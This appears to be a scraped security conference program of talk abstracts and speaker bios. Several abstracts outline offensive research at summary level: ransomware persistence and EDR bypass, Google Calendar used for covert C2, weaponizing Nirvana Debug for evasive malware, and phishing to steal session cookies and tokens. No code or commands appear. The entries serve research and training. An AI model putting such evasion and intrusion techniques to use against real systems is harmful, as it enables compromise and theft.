In the ever-evolving world of cybersecurity, attackers are one step ahead. But what happens when defenders rely on tools that attackers already know how to bypass? In this session, we dive deep into the mindset of adversaries and explore how modern Endpoint Detection and Response (EDR) systems are not the impenetrable fortress many think they are. As a defense researcher specializing in adversarial behavior, I’ve crafted a cross-platform ransomware (Windows, macOS, Linux) to understand the gaps in current defense mechanisms—not to cause harm, but to reveal how attackers think, act, and effortlessly slip past advanced defenses.
Through a live Proof of Concept (PoC) and in-depth technical walkthroughs, we’ll uncover the persistent techniques, evasion strategies, and overlooked system behaviors that let ransomware thrive even in well-defended environments. This talk isn’t meant to alarm—it’s an honest, reality-driven exploration of how attackers exploit EDRs, and more importantly, how defenders can bolster their security strategies.
If you work in blue team operations, threat hunting, or product security, expect to leave with a series of challenging questions rather than comforting answers.
I. Ransomware: Beyond Encryption
- Evolving Objectives: Extortion, Persistence, and Disruption
- When Persistence is the Key to Success, Not the Payload
II. Mastering Persistence Across Platforms
- macOS: LaunchAgents as a Stealthy Tool
- Windows: Registry Hijacking and Scheduled Tasks
- Linux: Cron Jobs, the Silent Worker
III. Building the Payload: Python and Java in Offensive Security
- Quick Deployment: Why high-level languages dominate the attack surface
- Modular and Adaptable: Flexibility over complexity for real-world attacks
IV. How EDRs Actually Work: A Deep Dive
- Detection Techniques: Behavioral analysis, memory scanning
- The Silent Failures: Weak telemetry collection and blind spots
- Evasion Patterns: From PoCs to real-world attacks
V. EDR Bypass: Simple Yet Effective Techniques
- Signature Evasion: Breaking through with minor tweaks
- Demonstration: How different commercial EDRs can be bypassed effortlessly
VI. Theory Meets Reality: Lessons Learned from PoCs
- Real-World PoCs: Demonstrating how defenses fail against basic, effective tactics
- Undetected Persistence: How attackers use legitimate tools and strategies to evade detection, even in heavily secured environments
- The Gap: Why static detection and behavioral analysis don’t always mesh—and how attackers exploit this vulnerability
VII. Final Thoughts: Turning Offensive Knowledge into Defensive Strength
- Adopting the Attacker’s Perspective: Understanding offensive techniques to fortify defenses
- Realism Over Optimism: Building adaptable, resilient security strategies with limited resources
- A Call to Action: Defend with pragmatism—recognize the attackers’ mindset to create proactive defenses
SpeakerBio: Zoziel Freire
I have been working with Information Technology for over 16 years. I worked for a long time as a consultant, providing services to several companies in different segments in Brazil and other countries.
During my career, I acquired vast experience in Incident Response, Forensic Analysis, Threat Hunting, Malware Analysis and Malicious Document Analysis. I worked sharing knowledge as OWASP Chapter Leader - Vitória.
I have some certifications in Information Security. I am passionate about malware development and analysis and forensic investigation.
I have worked with Ransomware Incidents in Brazil and other countries. I am a speaker at events on Hacking and Information Security, Malware Analysis and Information Security Awareness.
This talk revisits Google Calendar RAT (GCR), a proof-of-concept released in 2023 by the speaker, demonstrating how Google Calendar can be abused for stealthy Command & Control (C2) communication. A similar technique was recently observed in the wild, used by the APT41 threat group during a real-world campaign, which highlights the growing interest in abusing trusted cloud services for covert operations.
Building on that concept, the talk introduces a new Golang-based tool that enables SOCKS tunneling over Google services, establishing covert data channels.
The session explores how common cloud platforms can be repurposed to support discreet traffic forwarding and evade traditional network monitoring. While some familiarity with tunneling and cloud services may be helpful, the talk is designed to be accessible and will walk attendees through all key concepts.
Whether you're a penetration tester, red teamer, or simply curious about creative abuse of cloud infrastructure, you’ll leave with fresh ideas and practical insights.
References:
SpeakerBio: Valerio "MrSaighnal" Alessandroni
Valerio "MrSaighnal" Alessandroni is a seasoned offensive security professional with a lifelong passion for hacking. A former member of the Italian Army’s cyber units, he now leads EY Italy’s Offensive Security team, focusing on advanced red teaming and threat emulation.
He’s behind open-source tools like Google Calendar RAT (GCR) and he holds certifications including OSCP, OSEP, OSWE, OSWP, CRTO, eWPTX, eCPTX and more.
His bug bounty research has earned recognition from Microsoft, NASA, Harvard, and others. Off the keyboard, he rolls on the mat in Brazilian Jiu Jitsu and dreams of space exploration.
Rayhunter is an open source project from EFF to detect IMSI catchers. In this follow up to our main stage talk about the project we will take a deep dive into the internals of Rayhunter. We will talk about the architecture of the project, what we have gained by using Rust, porting to other devices, how to jailbreak new devices, the design of our detection heuristics, open source shenanigans, and how we analyze files sent to us. It's everything you didn't know you wanted to know about Rayhunter.
Speakers: oopsbagel, Cooper "CyberTiger" Quintin
oopsbagel is not a bagel but may be eating one while you read this. oops loves contributing to open source software, running wireshark, reversing, hardware hacking, breaking Kubernetes, and floaking.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFF
Cooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
Nirvana Debug is a Windows internal feature that has existed since Windows 7. The idea of this workshop is to see how this feature can be weaponized in order to either:
- Hijack execution flow
- Perform process injection
- Perform sleep obfuscation for a C2 beacon
During this workshop, you will learn the main principle of Nirvana Debugging and try to weaponize it. Some debugging, reverse engineering and coding will be needed in order to create a new malware that will evade classic EDR solutions.
WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP
SpeakerBio: Yoann "OtterHacker" DEQUEKER, RedTeam Leader at Wavestone
Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone holding the OSCP and CRTO certifications. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Development to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.
His research has led him to present his results at several conferences such as LeHack (Paris), Insomni'hack, BlackAlps (Switzerland) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). Throughout the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found in public products.
Residential solar promises energy independence, but behind the panels lies a chaotic mess of insecure firmware, exposed APIs, and rebadged devices phoning home to mystery servers. This talk exposes how today's solar microgrids can be hijacked through unauthenticated cloud APIs, unsigned firmware updates, hardcoded root credentials, and even vendor-enabled kill switches. No custom exploits. No insider access. Just publicly documented APIs, leaked serial numbers, and a shocking lack of basic security controls.
We will walk through real-world attacks, account takeover via brute-forced PINs, remote access to power dashboards with zero authentication, firmware tampering for persistent implants, and replay attacks against plaintext MODBUS traffic. Our research reveals how vulnerabilities silently propagate across cloned OEMs and shared cloud infrastructure, turning a single bug into an industry-wide risk. If you thought solar made you off-grid, this talk will change your threat model.
References:
Speakers: Anthony "Coin" Rose, Jake "Hubble" Krasnov
Dr. Anthony "Coin" Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security
Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
The new space race is here and as space systems become more interconnected and commercially accessible, their attack surface expands, making them prime targets for cyber threats. Yet, most organizations developing and operating satellites rely on traditional security models, if at all, that do not account for the unique risks of space-based assets. This talk explores the emerging discipline of space red teaming, where offensive security techniques are applied to test and validate the security of satellites, ground stations, and their supporting infrastructure.
In this talk we explore the following:
Understanding the space attack surface:
- A breakdown of key vulnerabilities in spacecraft, radio links, and ground control.
- Tactics, Techniques, and Procedures (TTPs): How attackers might compromise a space asset, disrupt communications, or manipulate telemetry.
- Defensive takeaways: How space operators can leverage red teaming to harden their architectures against real-world threats.
This presentation is ideal for penetration testers, security researchers, space engineers, and policy makers who want to understand the offensive side of space security. Whether you’re an experienced red teamer or just a space junky, this talk will provide practical insights into securing the next frontier.
SpeakerBio: Tim Fowler, ETHSO Labs
In this session we will showcase how you can leverage AI to build your Terraform packages for your Red Team Workshop. Make sure to bring your laptops!
SpeakerBio: Moses Frost
Moses Frost has been working in the field since the late 90's, having worked with computers in the late 80s for fun before moving into a more professional field shortly after high school. He is a Red Team Operator at Neuvik. A senior instructor and course author at the SANS Institute, he authors and teaches the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.
Referral Rewards Programs: functionality that most would probably view as boring and not worth the time looking at while hunting for bugs on a program. After a deep dive into the implementation of this functionality across dozens of programs, I found them to be hiding some very interesting bugs. My research uncovered various types of business logic flaws, race conditions, and even how the implementations created various client-side gadgets such as cookie-injection and client-side path traversal which could then be used as a part of a client-side chain. This research uncovered vulnerabilities in big name programs such as Instacart, PayPal and Robinhood.
SpeakerBio: Whit "un1tycyb3r" Taylor, Rhino Security Labs
As a penetration tester for Rhino Security Labs, I bring over a decade of experience to the security industry. For the past two years, I have specialized in bug bounty hunting and penetration testing, focusing on web applications and recently expanding into Android application security. My work has resulted in vulnerability submissions to major companies, including Epic Games and PayPal.
Beyond my primary roles, I actively conduct security research on open-source projects and emerging web technologies. This research has led to the discovery of several CVEs, including a critical Unauthenticated Remote Command Execution (RCE) vulnerability in Appsmith Enterprise Edition.
With the maritime industry handling a large portion of global trade, efficient, secure information transfer is essential. Technologies like unmanned aerial vehicles (UAVs), autonomous underwater vehicles (AUVs), and the Internet of Ships (IoS) are enhancing communication and operational efficiency, but they also pose security and network management challenges. Compromised IT systems can lead to easy access to operational technology (OT) networks, increasing the risk of zero-day attacks. This talk presents the current state of maritime comms and explores the feasibility of an SDN-SDR driven cross-layer framework using SATCOM infrastructure for resilient and reconfigurable maritime comms in dynamic, resource-constrained environments.
SpeakerBio: Avinash Srinivasan, US Naval Academy
Dr. Avinash Srinivasan is an Associate Professor in the Cyber Science department at the United States Naval Academy. He holds a Ph.D. and a Master's in Computer Science, and a Bachelor’s in Industrial Engineering. His research interests span the broad areas of cybersecurity and forensics. In particular, his research focuses on network security and forensics, security and forensics in cyber physical systems and critical infrastructure, steganography and information hiding, cloud computing forensics challenges, and privacy and anonymity. Dr. Srinivasan has administered several grants from agencies including DoD/Navy, NSF, DoJ, DHS, and DoEd. He has published 55 papers in prestigious refereed conferences and journals including IEEE Transactions on Information Forensics and Security, INFOCOM, ICDCS, and ACM SAC. Dr. Srinivasan also holds a patent (Patent number: 11210396). He currently serves on the editorial board for IEEE Transactions on Cognitive Communications and Networking as an Associate Editor. Dr. Srinivasan is a Certified Ethical Hacker (CEH) and Computer Hacking Forensics Investigator (CHFI). He has trained civilians as well as local and state law enforcement personnel in the areas of Macintosh Forensics and Network Forensics.
RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!
SpeakerBio: Cesare "Red5heep" Pizzi
Cesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.
Rev.ng is an open source static binary analysis framework and interactive decompiler for native code based on LLVM and QEMU. In our demo we will: [1] Introduce rev.ng and how to use it from the command line. [2] Decompile a simple program to syntactically valid C code that can be fed into other static analysis tools. [3] Showcase our automated whole-program type recovery on a stripped program without debug symbols, able to detect complex types, e.g. linked-lists. [4] Demonstrate the Python scripting capabilities. [5] Demonstrate our preliminary integration with LLMs to assign names to functions, types, and so on. All the examples will be released on GitHub and 100% reproducible using only open source software.
Speakers: Pietro Fezzardi, Alessandro Di Federico
Pietro is the CTO of rev.ng Labs, developing the rev.ng decompiler and reverse engineering framework. During his M.Sc. in mathematics, he started working on embedded systems programming. He received his PhD from Politecnico di Milano, working on automated bug-detection for high-level synthesis compilers for FPGA. He spent a short time at ARM in the research security group, working on fuzzing and static program analysis, before joining rev.ng. He is interested in program analysis, compilation, embedded systems programming, C++, free software, OpenStreetMap, juggling, and circus skills.
SpeakerBio: Alessandro Di Federico
Alessandro is the co-founder of rev.ng Labs. He obtained his PhD from Politecnico di Milano with a thesis about rev.ng and has been working on making a product out of it since then. He has been speaking at key industry and academic security conferences such as DEF CON, Recon, the USENIX Security Symposium, and others. He is passionate about compilers, C++, free software, reverse engineering, privacy, OpenStreetMap, hitchhiking, and hiking in the Alps.
We all love security, right? And when we trust a security component to safeguard our most valuable assets such as passwords, key material and biometrics, we want to believe they're doing a good job at it. But what happens when this assumption is flawed, and the chip that was going to protect our assets turns against us?
In this talk we'll present the ReVault attack that targets the [REDACTED] chip embedded in over 100 different laptops models from [VENDOR]. We will demonstrate how a low privilege user can fully compromise the chip, plunder its secrets, gain persistence on its application firmware and even hack Windows back. Are you ready for the heist?
SpeakerBio: Philippe "phLaul" Laulheret, Senior Vulnerability Researcher at Cisco Talos
Philippe Laulheret is a Senior Vulnerability Researcher at Cisco Talos. With a focus on Reverse Engineering and Vulnerability Research, Philippe uses his background in Embedded Security and Software Engineering to poke at complex systems and get them to behave in interesting ways. Philippe presented multiple projects covering hardware hacking, reverse engineering and exploitation at DEF CON, Hardwear.io, Eko Party and more. In his spare time, Philippe enjoys playing CTFs, immersing himself in the beauty of the Pacific Northwest, and exploring the realm of Creative Coding. Philippe holds a MSc in Computer Science from Georgia Tech and a MSc in Electrical and Computer Engineering from Supélec (France).
Practical security is the foundation of any security model. Beyond firewalls and network hardening, government and enterprise alike must consider how security infrastructure safeguards digital, material, and human assets. Physical security is foundational to the ability to resist unauthorized access or malicious threat.
In this training developed by world-renowned access-control expert Babak Javadi, students will be immersed in the mysteries of PACS tokens, RFID credentials, readers, alarm contacts, tamper switches, door controllers, and back-haul protocols that underpin Physical Access Control Systems (PACS) across the globe. The course provides a holistic and detailed view of modern access control and outlines common design limitations that can be exploited. Penetration testers will gain a practical understanding of what PACS looks like in the field, and how to intercept, clone, downgrade, replay, and bypass one's way through the system. Defenders, designers, and directors will come away with best practices and techniques that will resist attacks.
Participation will include hands-on practical experience with tools, exploits, and refined methods for compromising modern Physical Access Control Systems.
Speakers: Deviant Ollam, Bryan Black, Babak Javadi
While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Bryan Black, Red Team Alliance
Bryan Black is a seasoned physical security professional and esteemed assessment specialist with a comprehensive expertise spanning various facets of site security. His areas of specialization encompass video surveillance, intrusion detection/prevention, access control, network infrastructure, and penetration testing. With an illustrious track record of over a decade, he has collaborated closely with local and state law enforcement, federal and intelligence agencies, as well as prominent private sector corporations. Through these partnerships, he has been instrumental in advising clients and businesses on navigating the constantly evolving threat landscape. He is frequently acknowledged for his discerning critique of prevailing installations and practices within the industry. During his leisure hours, he leverages his engineering background and personal maker space to engage in product development. His endeavors encompass the meticulous design and refinement of innovative tools and procedures aimed at optimizing the efficiency and efficacy of both red and blue team engagement protocols.
SpeakerBio: Babak Javadi, Red Team Alliance
Babak Javadi is the President and Founder of The CORE Group, and one of the original co-founding Directors of TOOOL, The Open Organisation of Lockpickers. As a keystone member of the security industry, he is a well-recognized expert in professional circles and the hacker community. Babak's expertise extends to a wide range of security disciplines ranging from high security mechanical cylinders to alarm systems & physical access control systems. Over the past fifteen years Babak has presented and provided training to a wide range of commercial and government agencies, including Black Hat, The SANS Institute, the USMA at West Point, and more.
When exploring the dark web for OSINT or CTI investigations, you may be overwhelmed with numerous onion links, questionable marketplaces, and numerous search engines. With time constraints, how do you make sense of all this information and prioritize what truly matters? Enter Robin, an AI-powered dark web OSINT tool to streamline your investigations. Robin takes your query, automatically searches across multiple dark web search engines, scrapes relevant onion sites, and uses AI to generate clear, actionable investigative summaries. No more juggling five different tools or wasting hours validating dead links. In this tool demo, I’ll walk you through the real pain points of today’s dark web OSINT tools and show how Robin was built to solve them. I’ll cover the architecture, the scraping and summarization pipeline, and how Robin fits into real-world investigation workflows. I’ll also discuss future developments and how you can get involved. By the end of this talk, you will have a fresh perspective on dark web OSINT, a practical tool to use right away, and insights into how AI can simplify your dark web investigative process.
SpeakerBio: Apurv "ASG_Sc0rpi0n" Singh Gautam
Apurv is a cybercrime researcher working as a senior threat research analyst at Cyble. He is focused on monitoring and analyzing a wide spectrum of sources, creating automated tools, and performing threat investigations by utilizing HUMINT, SOCMINT, and OSINT and producing threat intelligence. He has contributed to the latest SANS Institute's course FOR589 on Cybercrime Intelligence and is a contributing member of Curated Intel. He has delivered talks and workshops at national and international conferences like SANS OSINT Summit, SANS Cyber Defense Forum, DEF CON Blue Team Village, BSides Singapore, RootCon, and others. He is featured in major podcasts like ITSPMagazine and Tech Talks with Singh. He is passionate about giving back to the community and helping others get into this field, and has delivered many talks and workshops in schools and colleges. He loves volunteering with StationX to help students navigate into cybersecurity. In the past, he has also volunteered as a darknet researcher at CTI League and the EBCS darknet analysis group. He holds a master's degree in information security from Georgia Institute of Technology. He looks forward to the end of the day to play and stream one of the AAA games, Rainbow 6 Siege.
Secure Shell (SSH) is finally fun again! After a wild two years, including a near-miss backdoor, clever cryptographic failures, unauthenticated remote code execution in OpenSSH, and piles of state machine bugs and authentication bypass issues, the security of SSH implementations has never been more relevant. This session is an extension of our 2024 work (Unexpected Exposures in the Secure Shell) and includes new research as well as big updates to our open source research and assessment tool, SSHamble.
Most recognized as the creator of Metasploit, HD's professional journey began with exploring telephone networks, developing exploits for the Department of Defense, and hacking into financial institution networks. When he's not working on runZero, he enjoys making weird Go projects, building janky electronics, running in circles, and playing single-player RPGs.
Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
We're kicking off right at 1000! Don't forget to check out our Merch table in the back of the village!
Bug bounty hunting is often portrayed as methodical recon, crafted payloads, and targeted testing. But sometimes, the most interesting vulnerabilities don’t come from planned attacks — they come from the chaos. In this talk, I’ll walk through a handful of real bugs I’ve reported over the years that found me instead.
SpeakerBio: Jasmin "JR0ch17" Landry
Jasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
Spotter is a groundbreaking open-source tool designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging Common Expression Language for policy definitions, we can define unified security scanning across development, CLI, CI/CD, admission controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS and MITRE ATT&CK. Spotter provides extremely high flexibility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.
SpeakerBio: Madhu "madhuakula" Akula, Pragmatic Security Leader
Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable-by-design Kubernetes cluster for learning and practicing Kubernetes security. He is also a published author and Cloud Native Security Architect with extensive experience, and an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc.). He holds industry certifications such as CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), and OSCP (Offensive Security Certified Professional).
Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.
His research has identified vulnerabilities in over 200 companies and organizations, including Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, and Adobe, and he is credited with multiple CVEs, acknowledgements, and rewards. He is co-author of Security Automation with Ansible 2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for the Learn Kubernetes Security and Practical Ansible 2 books by Packt Publishing. He also won first prize for building an infrastructure security monitoring solution at the InMobi flagship hackathon among 100+ engineering teams.
At DEF CON 24, an SSH honeypot on the open network held a puzzle that would go on to inspire the first Walkthrough Workshop. Although the Walkthrough Workshops at the Packet Hacking Village no longer feature Cowrie, its echoes live on at DEF CON. Out of the box, Cowrie is a medium-interaction SSH honeypot, but this level of interaction can be raised with a little elbow grease. From custom commands and adventure games to file systems laid out as spatial cubes, this talk explores several years of Cowrie-based challenges that will bash your expectations of terminal interaction.
SpeakerBio: Ryan Mitchell, Principal Software Engineer at Gerson Lehrman Group
Ryan Mitchell is a staff member at the Packet Hacking Village and the author of Unlocking Python (Wiley), Web Scraping with Python (O’Reilly), and multiple courses on LinkedIn Learning including Python Essential Training. She holds a master’s degree in software engineering from Harvard University Extension School and has worked as principal software engineer and data scientist on the search and artificial intelligence teams at the Gerson Lehrman Group for the last six years.
The maritime industry is rapidly digitizing, but how well is it securing its foundational digital infrastructure? In this talk, we present the results of a large-scale passive reconnaissance effort targeting the top 50 global maritime organizations—leveraging only open source intelligence (OSINT) and LLM-assisted analysis. By focusing on core security controls such as DNS, email authentication protocols, and other foundational internet services, we uncover a troubling landscape. All data was collected non-intrusively and ethically, relying exclusively on public data. Results will be presented in an anonymized and aggregated fashion, with a strong emphasis on reproducibility. In true hacker village spirit, we will release all scripts and tools used—empowering attendees to replicate the analysis, audit other industries, or expand upon our methodology. This session will not only highlight the maritime sector’s digital weaknesses but also demonstrate how anyone with OSINT skills and curiosity can surface meaningful insights about critical industries—with zero packets sent to the targets.
Speakers: Vlatko Kosturjak, MJ Casado
Vlatko Kosturjak serves as the VP of research at Marlink Cyber, boasting over two decades of dedicated experience in the realms of information security and cybersecurity. His diverse roles over the years have not only equipped him with a comprehensive understanding of security governance but also delved into the deep technical side of security. He has successful M&A experience in different fields of cyber security, including application security.
Vlatko finds joy in both breaking and building security controls. Beyond his commitment to security, he harbors a deep passion for open and free software. This passion has manifested in the creation of numerous popular open-source offensive tools and contributions to various renowned free security software projects.
Throughout his extensive career and in his continuous pursuit of knowledge in the dynamic field of cybersecurity, Vlatko has acquired a long array of certifications, including CISSP, OSCP, CISM, and many more.
SpeakerBio: MJ Casado
The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server-based infrastructure, we will use serverless infra to launch stealth attacks rotating trusted implicit domains & integrating directly with productivity apps like Slack, Teams, etc.
The flow of the workshop:
Workshop Duration: 120 Minutes
Speakers: Manish Gupta, Yash Bharadwaj
Manish Gupta is Director of CyberWarFare Labs with 7.5+ years of expertise in offensive information security, where he specializes in red teaming activities in enterprise environments. His research interests include real-world cyber attack simulation and advanced persistent threats (APT). Previously he has presented his research at reputed conferences like Black Hat USA, DEF CON, Nullcon, BSides chapters, X33fcon, and NorthSec, as well as at corporate trainings.
SpeakerBio: Yash Bharadwaj
Yash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating identity-based attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership.
You've seen us swamp chillout areas guerrilla style with tables full of stickers, but now we finally got our act together and have a formal place and time. Come swap stickers, chat with creators, and join the growing subculture of sticker lovers. Follow @dcstickerswap on Twitter for updates.
Come stop by for our first official event, where we will have custom stickers for VX Underground, Skyhopper, and more!
What is it actually like to support and balance a global anonymity network, with users ranging from political dissidents to national security analysts? You say it's important to teach law enforcement and governments about privacy and end-to-end encryption, but how do those conversations go in practice? I heard you accidentally got Russia to block all of Azure for a day? Are you ever going to do a Tor talk in China? Wait, who exactly tried to bribe you to leave bugs in Tor to support their criminal schemes?
Historically I've tried to downplay some of the excitement from operating the Tor network and teaching the world about Tor, but this year I'm going to try my hand at the "war stories" track.
Roger Dingledine is co-founder and original developer of the Tor Project, a nonprofit that develops free and open source software to protect people from tracking, censorship, and surveillance online. Roger works with journalists and activists on many continents to help them understand and defend against the threats they face, and he is a lead researcher in the online anonymity field. EFF picked him for a Pioneer Award, and Foreign Policy magazine chose him as one of its top 100 global thinkers.
Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.
SpeakerBio: Martin "tincho_508" Doyhenard, Security Researcher at PortSwigger
Martin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. He is renowned for presenting multiple pieces of groundbreaking research at premier conferences like Black Hat, DEF CON and RSA. An active participant in Capture The Flag (CTF) competitions and bug bounty programs, he consistently uncovers critical vulnerabilities and drives innovation in cybersecurity.
We all know that Business Continuity and Disaster Recovery are vitally important to every organization - but what about individuals? Explore how to protect yourself and your loved ones through ever-growing data mining, PII breaches, and socio-political upheaval with best practice BCDR techniques.
SpeakerBio: Rebecah Miller
Rebecah is a Business Continuity & Disaster Recovery consultant, creating and testing continuity and resilience plans across all organizational sectors. After working through a disaster at a company that was not prepared, she changed careers to focus on security and risk management in an effort to improve the resiliency of others.
Attendees will get hands-on with some AI pen testing techniques based on the instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.
SpeakerBio: Lee McWhorter
Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.
What happens when you gather 4 hackers together to complete silly tasks, rank their execution, and see who ends up with the most points at the end? TaskMooster, that’s what. Inspired by the UK game show Taskmaster, TaskMooster brings lateral thinking, comedic tasks, and general shenanigans to DEF CON. What? You haven’t heard of Taskmaster? Seriously, stop reading this program right now and go watch at least one episode. All seasons are available to stream on YouTube, and it’s totally binge-worthy.
Come join the contestants as they see how they performed for each task and get graded by our very own TaskMooster. The winner gets to take home the coveted Golden Telephone and bragging rights for being the TaskMooster champion.
The participants are selected in advance. We will film the pre-con tasks in Maryland several months before DEF CON and then will convene on stage at DEF CON in August for the live event.
Designed for wireless security testing and autonomous reconnaissance, Tengu Marauder v2 is a multi-terrain open-source robotic platform. Built around a Raspberry Pi and using ROS2, it combines real-time motor control, RF monitoring, and sensor data streaming to facilitate remote operations in challenging environments. Compared with the initial architecture, the v2 platform brings major enhancements in system modularity, communication security, and operational flexibility. Designed for safe remote access over encrypted VPN tunnels, the robot allows internet-based control and telemetry without exposing the system to direct network threats. Tengu Marauder v2 provides a tough, scalable basis for incorporating autonomy and cyber capabilities into your mobile security toolset, whether used for off-grid automation, robotics teaching, or red teaming.
Speakers: Lexie "L3xic0n" Thach, Munir Muhammad
